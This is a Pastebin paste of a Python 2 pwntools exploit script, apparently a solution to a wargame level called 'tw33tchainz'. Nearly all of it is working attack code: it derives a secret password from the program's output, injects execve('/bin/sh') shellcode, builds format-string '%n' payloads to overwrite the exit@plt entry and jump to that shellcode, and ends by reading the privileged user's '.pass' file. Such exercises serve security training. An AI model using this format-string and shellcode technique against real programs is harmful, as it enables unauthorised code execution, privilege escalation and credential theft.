Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import struct
- import sys
- import subprocess
- import binascii
- import array
- import math
- import itertools
- from itertools import dropwhile
- from pwnlib.asm import asm, disasm, context, make_elf
- # toolz was not installed so these functions were copied over
- def first(seq):
- """ The first element in a sequence
- >>> first('ABC')
- 'A'
- """
- return next(iter(seq))
- def second(seq):
- """ The second element in a sequence
- >>> second('ABC')
- 'B'
- """
- return next(itertools.islice(seq, 1, None))
- context.clear()
- context.arch = 'i386'
- context.bits = 32
- username = map(ord, 'cccc000acccccccccccccccccccccccc'.decode('hex'))
- salt = map(ord, 'baba000ababababababababababababa'.decode('hex'))
- p = subprocess.Popen(['/levels/project1/tw33tchainz'],
- stdout=subprocess.PIPE,
- stdin=subprocess.PIPE)
- p.stdin.write('\n'.join([
- '\n',
- '\n'
- ]).ljust(4096, '\n'))
- # skip noise
- first(dropwhile(lambda line: 'Generated' not in line,
- iter(p.stdout.readline, '')))
- generated = p.stdout.readline()
- generated = map(ord, generated.strip().decode('hex'))
- secret_pass = ''
- for i in range(16):
- secret_pass += ("%.2x" % (((username[i] ^ generated[i]) - salt[i] + 2**32) & 0xff))
- s = struct.pack('<I', int(secret_pass[:8], 16)) + \
- struct.pack('<I', int(secret_pass[8:16], 16)) + \
- struct.pack('<I', int(secret_pass[16:24], 16)) + \
- struct.pack('<I', int(secret_pass[24:], 16))
- p.stdin.write('\n'.join([
- '3',
- s,
- '\n',
- '6',
- '\n',
- '\n',
- '1',
- "/bin/sh\x00",
- "\n",
- "2",
- "\n",
- ]).ljust(4096, '\n'))
- output = dropwhile(lambda line: 'Address' not in line,
- iter(p.stdout.readline, ''))
- address = first(output)[-11:].strip()
- instructions = [
- "xor eax, eax",
- "mov ebx, %s" % address,
- "xor ecx, ecx",
- "xor edx, edx",
- "mov al, 0xb",
- "int 0x80"
- ]
- shellcode = ''
- for instr in instructions:
- shellcode += asm(instr)
- p.stdin.write('\n'.join([
- "1",
- shellcode,
- "\n",
- "2",
- "\n",
- ]).ljust(4096, '\n'))
- output = dropwhile(lambda line: 'Address' not in line,
- iter(p.stdout.readline, ''))
- shellcode_address = int(second(output)[-11:].strip(), 16)
- # exit@plt
- base_addr = 0x804d03c
- first_addr = struct.pack('<I', base_addr)
- second_addr = struct.pack('<I', base_addr+1)
- third_addr = struct.pack('<I', base_addr+2)
- offset = 8
- lob = (shellcode_address & 0xff) - 0x5
- first_input = "A" + first_addr + "%%%dx" % lob + "%%%i$n" % offset
- lob = ((shellcode_address & 0xff00) >> 8) - 0x5
- second_input = "A" + second_addr + "%%%dx" % lob + "%%%i$n" % offset
- lob = ((shellcode_address & 0xffff0000) >> 16) - 0x5
- third_input = "A" + third_addr + "%%%dx" % lob + "%%%i$n" % offset
- p.stdin.write('\n'.join([
- "1",
- first_input,
- "\n",
- "1",
- second_input,
- "\n",
- "1",
- third_input,
- "\n",
- "5",
- "\n"
- ]).ljust(4096, '\n'))
- p.stdin.write('cat /home/project1_priv/.pass\n')
- print p.communicate()[0]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement